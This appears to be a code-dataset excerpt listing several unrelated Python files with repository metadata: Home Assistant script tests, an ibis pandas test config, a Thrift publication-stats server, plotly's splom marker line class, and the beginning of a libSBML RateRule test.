"""Turn script on.
This is a legacy helper method. Do not use it for new tests.
"""
_, object_id = split_entity_id(entity_id)
hass.services.call(DOMAIN, object_id, variables, context=context)
@bind_hass
def turn_off(hass, entity_id):
"""Turn script on.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: entity_id})
@bind_hass
def toggle(hass, entity_id):
"""Toggle the script.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: entity_id})
@bind_hass
def reload(hass):
"""Reload script component.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_RELOAD)
class TestScriptComponent(unittest.TestCase):
"""Test the Script component."""
# pylint: disable=invalid-name
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_with_invalid_configs(self):
"""Test setup with invalid configs."""
for value in (
{"test": {}},
{"test hello world": {"sequence": [{"event": "bla"}]}},
{
"test": {
"sequence": {
"event": "test_event",
"service": "homeassistant.turn_on",
}
}
},
):
assert not setup_component(
self.hass, "script", {"script": value}
), "Script loaded with wrong config {}".format(value)
assert 0 == len(self.hass.states.entity_ids("script"))
def test_turn_on_service(self):
"""Verify that the turn_on service."""
event = "test_event"
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
assert setup_component(
self.hass,
"script",
{
"script": {
"test": {"sequence": [{"delay": {"seconds": 5}}, {"event": event}]}
}
},
)
turn_on(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
# Calling turn_on a second time should not advance the script
turn_on(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert 0 == len(events)
turn_off(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert not script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
state = self.hass.states.get("group.all_scripts")
assert state is not None
assert state.attributes.get("entity_id") == (ENTITY_ID,)
def test_toggle_service(self):
"""Test the toggling of a service."""
event = "test_event"
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
assert setup_component(
self.hass,
"script",
{
"script": {
"test": {"sequence": [{"delay": {"seconds": 5}}, {"event": event}]}
}
},
)
toggle(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
toggle(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert not script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
def test_passing_variables(self):
"""Test different ways of passing in variables."""
calls = []
context = Context()
@callback
def record_call(service):
"""Add recorded event to set."""
calls.append(service)
self.hass.services.register("test", "script", record_call)
assert setup_component(
self.hass,
"script",
{
"script": {
"test": {
"sequence": {
"service": "test.script",
"data_template": {"hello": "{{ greeting }}"},
}
}
}
},
)
turn_on(self.hass, ENTITY_ID, {"greeting": "world"}, context=context)
self.hass.block_till_done()
assert len(calls) == 1
assert calls[0].context is context
assert calls[0].data["hello"] == "world"
self.hass.services.call(
"script", "test", {"greeting": "universe"}, context=context
)
self.hass.block_till_done()
assert len(calls) == 2
assert calls[1].context is context
assert calls[1].data["hello"] == "universe"
def test_reload_service(self):
"""Verify that the turn_on service."""
assert setup_component(
self.hass,
"script",
{"script": {"test": {"sequence": [{"delay": {"seconds": 5}}]}}},
)
assert self.hass.states.get(ENTITY_ID) is not None
assert self.hass.services.has_service(script.DOMAIN, "test")
with patch(
"homeassistant.config.load_yaml_config_file",
return_value={
"script": {"test2": {"sequence": [{"delay": {"seconds": 5}}]}}
},
):
with patch("homeassistant.config.find_config_file", return_value=""):
reload(self.hass)
self.hass.block_till_done()
assert self.hass.states.get(ENTITY_ID) is None
assert not self.hass.services.has_service(script.DOMAIN, "test")
assert self.hass.states.get("script.test2") is not None
assert self.hass.services.has_service(script.DOMAIN, "test2")
async def test_shared_context(hass):
"""Test that the shared context is passed down the chain."""
event = "test_event"
context = Context()
event_mock = Mock()
run_mock = Mock()
hass.bus.async_listen(event, event_mock)
hass.bus.async_listen(EVENT_SCRIPT_STARTED, run_mock)
assert await async_setup_component(
hass, "script", {"script": {"test": {"sequence": [{"event": event}]}}}
)
await hass.services.async_call(
DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID}, context=context
)
await hass.async_block_till_done()
assert event_mock.call_count == 1
assert run_mock.call_count == 1
args, kwargs = run_mock.call_args
assert args[0].context == context
# Ensure event data has all attributes set
assert args[0].data.get(ATTR_NAME) == "test"
assert args[0].data.get(ATTR_ENTITY_ID) == "script.test"
# Ensure context carries through the event
args, kwargs = event_mock.call_args
assert args[0].context == context
# Ensure the script state shares the same context
state = hass.states.get("script.test")
assert state is not None
assert state.context == context
async def test_logging_script_error(hass, caplog):
"""Test logging script error."""
assert await async_setup_component(
hass,
"script",
{"script": {"hello": {"sequence": [{"service": "non.existing"}]}}},
)
with pytest.raises(ServiceNotFound) as err:
await hass.services.async_call("script", "hello", blocking=True)
assert err.value.domain == "non"
assert err.value.service == "existing"
assert "Error executing script" in caplog.text
async def test_turning_no_scripts_off(hass):
"""Test it is possible to turn two scripts off."""
assert await async_setup_component(hass, "script", {})
# Testing it doesn't raise
await hass.services.async_call(
DOMAIN, SERVICE_TURN_OFF, {"entity_id": []}, blocking=True
)
|
apache-2.0
| -9,201,643,174,911,545,000 | 28.493506 | 87 | 0.572105 | false |
cloudera/ibis
|
ibis/backends/pandas/tests/conftest.py
|
1
|
1158
|
from pathlib import Path
import pandas as pd
import ibis
import ibis.expr.operations as ops
from ibis.backends.tests.base import BackendTest, RoundHalfToEven
class TestConf(BackendTest, RoundHalfToEven):
check_names = False
additional_skipped_operations = frozenset({ops.StringSQLLike})
supported_to_timestamp_units = BackendTest.supported_to_timestamp_units | {
'ns'
}
supports_divide_by_zero = True
returned_timestamp_unit = 'ns'
@staticmethod
def connect(data_directory: Path) -> ibis.client.Client:
return ibis.pandas.connect(
{
'functional_alltypes': pd.read_csv(
str(data_directory / 'functional_alltypes.csv'),
index_col=None,
dtype={'bool_col': bool, 'string_col': str},
parse_dates=['timestamp_col'],
encoding='utf-8',
),
'batting': pd.read_csv(str(data_directory / 'batting.csv')),
'awards_players': pd.read_csv(
str(data_directory / 'awards_players.csv')
),
}
)
|
apache-2.0
| 8,643,831,911,716,360,000 | 32.085714 | 79 | 0.570812 | false |
fabiobatalha/publication_stats
|
publication/thrift/server.py
|
1
|
7000
|
# coding: utf-8
import json
import argparse
import logging
import os
import sys
from publication.controller import stats, ServerError
import thriftpy
import thriftpywrap
from thriftpy.rpc import make_server
logger = logging.getLogger(__name__)
publication_stats_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__), 'publication_stats.thrift'))
class Dispatcher(object):
def __init__(self):
self._stats = stats()
def _stats_dispatcher(self, *args, **kwargs):
try:
data = self._stats.publication_stats(*args, **kwargs)
except ValueError as e:
logging.error(e.message)
raise publication_stats_thrift.ValueError(message=e.message)
except ServerError as e:
raise publication_stats_thrift.ServerError(message=e.message)
return data
def search(self, doc_type, body, parameters):
params = {i.key:i.value for i in parameters}
params['doc_type'] = doc_type
params['body'] = json.loads(body)
try:
data = self._stats.publication_search(params)
except ValueError as e:
logging.error(e.message)
raise publication_stats_thrift.ValueError(message=e.message)
except ServerError as e:
raise publication_stats_thrift.ServerError(message=e.message)
try:
data_str = json.dumps(data)
except ValueError as e:
logging.error('Invalid JSON data: %s' % data_str)
raise publication_stats_thrift.ValueError(message=e.message)
return data_str
def journal(self, aggs=None, filters=None):
try:
data = self._stats_dispatcher('journal', aggs=aggs, filters=filters)
except ValueError as err:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server: %s' % err.message
)
result = json.dumps(data)
return result
def journal_subject_areas(self, filters=None):
data = self._stats_dispatcher('journal', aggs=['subject_areas'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['subject_areas']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def journal_collections(self, filters=None):
data = self._stats_dispatcher('journal', aggs=['collection'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['collection']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def journal_statuses(self, filters=None):
data = self._stats_dispatcher('journal', aggs=['status'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['status']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def journal_inclusion_years(self, filters=None):
data = self._stats_dispatcher('journal', aggs=['included_at_year'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['included_at_year']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document_subject_areas(self, filters=None):
data = self._stats_dispatcher('article', aggs=['subject_areas'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['subject_areas']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document(self, aggs=None, filters=None):
try:
data = self._stats_dispatcher('article', aggs=aggs, filters=filters)
except ValueError as err:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server: %s' % err.message
)
result = json.dumps(data)
return result
def document_collections(self, filters=None):
data = self._stats_dispatcher('article', aggs=['collection'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['collection']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document_publication_years(self, filters=None):
data = self._stats_dispatcher('article', aggs=['publication_year'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['publication_year']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document_languages(self, filters=None):
data = self._stats_dispatcher('article', aggs=['languages'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['languages']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document_affiliation_countries(self, filters=None):
data = self._stats_dispatcher('article', aggs=['aff_countries'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['aff_countries']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document_types(self, filters=None):
data = self._stats_dispatcher('article', aggs=['document_type'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['document_type']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
main = thriftpywrap.ConsoleApp(publication_stats_thrift.PublicationStats, Dispatcher)
|
bsd-2-clause
| -4,031,151,090,188,490,000 | 30.96347 | 142 | 0.611143 | false |
plotly/python-api
|
packages/python/plotly/plotly/graph_objs/splom/marker/_line.py
|
1
|
24938
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Line(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "splom.marker"
_path_str = "splom.marker.line"
_valid_props = {
"autocolorscale",
"cauto",
"cmax",
"cmid",
"cmin",
"color",
"coloraxis",
"colorscale",
"colorsrc",
"reversescale",
"width",
"widthsrc",
}
# autocolorscale
# --------------
@property
def autocolorscale(self):
"""
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.line.colorscale`. Has an effect only if in
`marker.line.color`is set to a numerical array. In case
`colorscale` is unspecified or `autocolorscale` is true, the
default palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or mixed.
The 'autocolorscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocolorscale"]
@autocolorscale.setter
def autocolorscale(self, val):
self["autocolorscale"] = val
# cauto
# -----
@property
def cauto(self):
"""
Determines whether or not the color domain is computed with
respect to the input data (here in `marker.line.color`) or the
bounds set in `marker.line.cmin` and `marker.line.cmax` Has an
effect only if in `marker.line.color`is set to a numerical
array. Defaults to `false` when `marker.line.cmin` and
`marker.line.cmax` are set by the user.
The 'cauto' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["cauto"]
@cauto.setter
def cauto(self, val):
self["cauto"] = val
# cmax
# ----
@property
def cmax(self):
"""
Sets the upper bound of the color domain. Has an effect only if
in `marker.line.color`is set to a numerical array. Value should
have the same units as in `marker.line.color` and if set,
`marker.line.cmin` must be set as well.
The 'cmax' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmax"]
@cmax.setter
def cmax(self, val):
self["cmax"] = val
# cmid
# ----
@property
def cmid(self):
"""
Sets the mid-point of the color domain by scaling
`marker.line.cmin` and/or `marker.line.cmax` to be equidistant
to this point. Has an effect only if in `marker.line.color`is
set to a numerical array. Value should have the same units as
in `marker.line.color`. Has no effect when `marker.line.cauto`
is `false`.
The 'cmid' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmid"]
@cmid.setter
def cmid(self, val):
self["cmid"] = val
# cmin
# ----
@property
def cmin(self):
"""
Sets the lower bound of the color domain. Has an effect only if
in `marker.line.color`is set to a numerical array. Value should
have the same units as in `marker.line.color` and if set,
`marker.line.cmax` must be set as well.
The 'cmin' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmin"]
@cmin.setter
def cmin(self, val):
self["cmin"] = val
# color
# -----
@property
def color(self):
"""
Sets themarker.linecolor. It accepts either a specific color or
an array of numbers that are mapped to the colorscale relative
to the max and min values of the array or relative to
`marker.line.cmin` and `marker.line.cmax` if set.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A number that will be interpreted as a color
according to splom.marker.line.colorscale
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# coloraxis
# ---------
@property
def coloraxis(self):
"""
Sets a reference to a shared color axis. References to these
shared color axes are "coloraxis", "coloraxis2", "coloraxis3",
etc. Settings for these shared color axes are set in the
layout, under `layout.coloraxis`, `layout.coloraxis2`, etc.
Note that multiple color scales can be linked to the same color
axis.
The 'coloraxis' property is an identifier of a particular
subplot, of type 'coloraxis', that may be specified as the string 'coloraxis'
optionally followed by an integer >= 1
(e.g. 'coloraxis', 'coloraxis1', 'coloraxis2', 'coloraxis3', etc.)
Returns
-------
str
"""
return self["coloraxis"]
@coloraxis.setter
def coloraxis(self, val):
self["coloraxis"] = val
# colorscale
# ----------
@property
def colorscale(self):
"""
Sets the colorscale. Has an effect only if in
`marker.line.color`is set to a numerical array. The colorscale
must be an array containing arrays mapping a normalized value
to an rgb, rgba, hex, hsl, hsv, or named color string. At
minimum, a mapping for the lowest (0) and highest (1) values
are required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the colorscale in
color space, use`marker.line.cmin` and `marker.line.cmax`.
Alternatively, `colorscale` may be a palette name string of the
following list: Greys,YlGnBu,Greens,YlOrRd,Bluered,RdBu,Reds,Bl
ues,Picnic,Rainbow,Portland,Jet,Hot,Blackbody,Earth,Electric,Vi
ridis,Cividis.
The 'colorscale' property is a colorscale and may be
specified as:
- A list of colors that will be spaced evenly to create the colorscale.
Many predefined colorscale lists are included in the sequential, diverging,
and cyclical modules in the plotly.colors package.
- A list of 2-element lists where the first element is the
normalized color level value (starting at 0 and ending at 1),
and the second item is a valid color string.
(e.g. [[0, 'green'], [0.5, 'red'], [1.0, 'rgb(0, 0, 255)']])
- One of the following named colorscales:
['aggrnyl', 'agsunset', 'algae', 'amp', 'armyrose', 'balance',
'blackbody', 'bluered', 'blues', 'blugrn', 'bluyl', 'brbg',
'brwnyl', 'bugn', 'bupu', 'burg', 'burgyl', 'cividis', 'curl',
'darkmint', 'deep', 'delta', 'dense', 'earth', 'edge', 'electric',
'emrld', 'fall', 'geyser', 'gnbu', 'gray', 'greens', 'greys',
'haline', 'hot', 'hsv', 'ice', 'icefire', 'inferno', 'jet',
'magenta', 'magma', 'matter', 'mint', 'mrybm', 'mygbm', 'oranges',
'orrd', 'oryel', 'peach', 'phase', 'picnic', 'pinkyl', 'piyg',
'plasma', 'plotly3', 'portland', 'prgn', 'pubu', 'pubugn', 'puor',
'purd', 'purp', 'purples', 'purpor', 'rainbow', 'rdbu', 'rdgy',
'rdpu', 'rdylbu', 'rdylgn', 'redor', 'reds', 'solar', 'spectral',
'speed', 'sunset', 'sunsetdark', 'teal', 'tealgrn', 'tealrose',
'tempo', 'temps', 'thermal', 'tropic', 'turbid', 'twilight',
'viridis', 'ylgn', 'ylgnbu', 'ylorbr', 'ylorrd'].
Appending '_r' to a named colorscale reverses it.
Returns
-------
str
"""
return self["colorscale"]
@colorscale.setter
def colorscale(self, val):
self["colorscale"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on Chart Studio Cloud for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# reversescale
# ------------
@property
def reversescale(self):
"""
Reverses the color mapping if true. Has an effect only if in
`marker.line.color`is set to a numerical array. If true,
`marker.line.cmin` will correspond to the last color in the
array and `marker.line.cmax` will correspond to the first
color.
The 'reversescale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["reversescale"]
@reversescale.setter
def reversescale(self, val):
self["reversescale"] = val
# width
# -----
@property
def width(self):
"""
Sets the width (in px) of the lines bounding the marker points.
The 'width' property is a number and may be specified as:
- An int or float in the interval [0, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["width"]
@width.setter
def width(self, val):
self["width"] = val
# widthsrc
# --------
@property
def widthsrc(self):
"""
Sets the source reference on Chart Studio Cloud for width .
The 'widthsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["widthsrc"]
@widthsrc.setter
def widthsrc(self, val):
self["widthsrc"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.line.colorscale`. Has an effect only if in
`marker.line.color`is set to a numerical array. In case
`colorscale` is unspecified or `autocolorscale` is
true, the default palette will be chosen according to
whether numbers in the `color` array are all positive,
all negative or mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here in
`marker.line.color`) or the bounds set in
`marker.line.cmin` and `marker.line.cmax` Has an
effect only if in `marker.line.color`is set to a
numerical array. Defaults to `false` when
`marker.line.cmin` and `marker.line.cmax` are set by
the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if in `marker.line.color`is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmin` must
be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.line.cmin` and/or `marker.line.cmax` to be
equidistant to this point. Has an effect only if in
`marker.line.color`is set to a numerical array. Value
should have the same units as in `marker.line.color`.
Has no effect when `marker.line.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if in `marker.line.color`is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmax` must
be set as well.
color
Sets themarker.linecolor. It accepts either a specific
color or an array of numbers that are mapped to the
colorscale relative to the max and min values of the
array or relative to `marker.line.cmin` and
`marker.line.cmax` if set.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorscale
Sets the colorscale. Has an effect only if in
`marker.line.color`is set to a numerical array. The
colorscale must be an array containing arrays mapping a
normalized value to an rgb, rgba, hex, hsl, hsv, or
named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For
example, `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in color space,
use`marker.line.cmin` and `marker.line.cmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Greys,YlGnBu,Greens,YlOrR
d,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,Portland,Jet,H
ot,Blackbody,Earth,Electric,Viridis,Cividis.
colorsrc
Sets the source reference on Chart Studio Cloud for
color .
reversescale
Reverses the color mapping if true. Has an effect only
if in `marker.line.color`is set to a numerical array.
If true, `marker.line.cmin` will correspond to the last
color in the array and `marker.line.cmax` will
correspond to the first color.
width
Sets the width (in px) of the lines bounding the marker
points.
widthsrc
Sets the source reference on Chart Studio Cloud for
width .
"""
def __init__(
self,
arg=None,
autocolorscale=None,
cauto=None,
cmax=None,
cmid=None,
cmin=None,
color=None,
coloraxis=None,
colorscale=None,
colorsrc=None,
reversescale=None,
width=None,
widthsrc=None,
**kwargs
):
"""
Construct a new Line object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.splom.marker.Line`
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.line.colorscale`. Has an effect only if in
`marker.line.color`is set to a numerical array. In case
`colorscale` is unspecified or `autocolorscale` is
true, the default palette will be chosen according to
whether numbers in the `color` array are all positive,
all negative or mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here in
`marker.line.color`) or the bounds set in
`marker.line.cmin` and `marker.line.cmax` Has an
effect only if in `marker.line.color`is set to a
numerical array. Defaults to `false` when
`marker.line.cmin` and `marker.line.cmax` are set by
the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if in `marker.line.color`is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmin` must
be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.line.cmin` and/or `marker.line.cmax` to be
equidistant to this point. Has an effect only if in
`marker.line.color`is set to a numerical array. Value
should have the same units as in `marker.line.color`.
Has no effect when `marker.line.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if in `marker.line.color`is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmax` must
be set as well.
color
Sets themarker.linecolor. It accepts either a specific
color or an array of numbers that are mapped to the
colorscale relative to the max and min values of the
array or relative to `marker.line.cmin` and
`marker.line.cmax` if set.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorscale
Sets the colorscale. Has an effect only if in
`marker.line.color`is set to a numerical array. The
colorscale must be an array containing arrays mapping a
normalized value to an rgb, rgba, hex, hsl, hsv, or
named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For
example, `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in color space,
use`marker.line.cmin` and `marker.line.cmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Greys,YlGnBu,Greens,YlOrR
d,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,Portland,Jet,H
ot,Blackbody,Earth,Electric,Viridis,Cividis.
colorsrc
Sets the source reference on Chart Studio Cloud for
color .
reversescale
Reverses the color mapping if true. Has an effect only
if in `marker.line.color`is set to a numerical array.
If true, `marker.line.cmin` will correspond to the last
color in the array and `marker.line.cmax` will
correspond to the first color.
width
Sets the width (in px) of the lines bounding the marker
points.
widthsrc
Sets the source reference on Chart Studio Cloud for
width .
Returns
-------
Line
"""
super(Line, self).__init__("line")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.splom.marker.Line
constructor must be a dict or
an instance of :class:`plotly.graph_objs.splom.marker.Line`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("autocolorscale", None)
_v = autocolorscale if autocolorscale is not None else _v
if _v is not None:
self["autocolorscale"] = _v
_v = arg.pop("cauto", None)
_v = cauto if cauto is not None else _v
if _v is not None:
self["cauto"] = _v
_v = arg.pop("cmax", None)
_v = cmax if cmax is not None else _v
if _v is not None:
self["cmax"] = _v
_v = arg.pop("cmid", None)
_v = cmid if cmid is not None else _v
if _v is not None:
self["cmid"] = _v
_v = arg.pop("cmin", None)
_v = cmin if cmin is not None else _v
if _v is not None:
self["cmin"] = _v
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
_v = arg.pop("coloraxis", None)
_v = coloraxis if coloraxis is not None else _v
if _v is not None:
self["coloraxis"] = _v
_v = arg.pop("colorscale", None)
_v = colorscale if colorscale is not None else _v
if _v is not None:
self["colorscale"] = _v
_v = arg.pop("colorsrc", None)
_v = colorsrc if colorsrc is not None else _v
if _v is not None:
self["colorsrc"] = _v
_v = arg.pop("reversescale", None)
_v = reversescale if reversescale is not None else _v
if _v is not None:
self["reversescale"] = _v
_v = arg.pop("width", None)
_v = width if width is not None else _v
if _v is not None:
self["width"] = _v
_v = arg.pop("widthsrc", None)
_v = widthsrc if widthsrc is not None else _v
if _v is not None:
self["widthsrc"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
mit
| -8,391,715,932,195,973,000 | 36.842185 | 87 | 0.565322 | false |
alexholehouse/SBMLIntegrator
|
libsbml-5.0.0/src/bindings/python/test/sbml/TestRateRule.py
|
1
|
3765
|
#
# @file TestRateRule.py
# @brief RateRule unit tests
#
# @author Akiya Jouraku (Python conversion)
# @author Ben Bornstein
#
# $Id$
# $HeadURL$
#
# ====== WARNING ===== WARNING ===== WARNING ===== WARNING ===== WARNING ======
#
# DO NOT EDIT THIS FILE.
#
# This file was generated automatically by converting the file located at
# src/sbml/test/TestRateRule.c
# using the conversion program dev/utilities/translateTests/translateTests.pl.
# Any changes made here will be lost the next time the file is regenerated.
#
# -----------------------------------------------------------------------------
# This file is part of libSBML. Please visit http://sbml.org for more
# information about SBML, and the latest version of libSBML.
#
# Copyright 2005-2010 California Institute of Technology.
# Copyright 2002-2005 California Institute of Technology and
# Japan Science and Technology Corporation.
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation. A copy of the license agreement is provided
# in the file named "LICENSE.txt" included with this software distribution
# and also available online as http://sbml.org/software/libsbml/license.html
# -----------------------------------------------------------------------------
import sys
import unittest
import libsbml
class TestRateRule(unittest.TestCase):
global RR
RR = None
def setUp(self):
self.RR = libsbml.RateRule(1,2)
if (self.RR == None):
pass
pass
def tearDown(self):
_dummyList = [ self.RR ]; _dummyList[:] = []; del _dummyList
pass
def test_RateRule_create(self):
self.assert_( self.RR.getTypeCode() == libsbml.SBML_RATE_RULE )
self.assert_( self.RR.getMetaId() == "" )
self.assert_( self.RR.getNotes() == None )
self.assert_( self.RR.getAnnotation() == None )
self.assert_( self.RR.getFormula() == "" )
self.assert_( self.RR.getMath() == None )
self.assert_( self.RR.getVariable() == "" )
self.assert_( self.RR.getType() == libsbml.RULE_TYPE_RATE )
pass
def test_RateRule_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
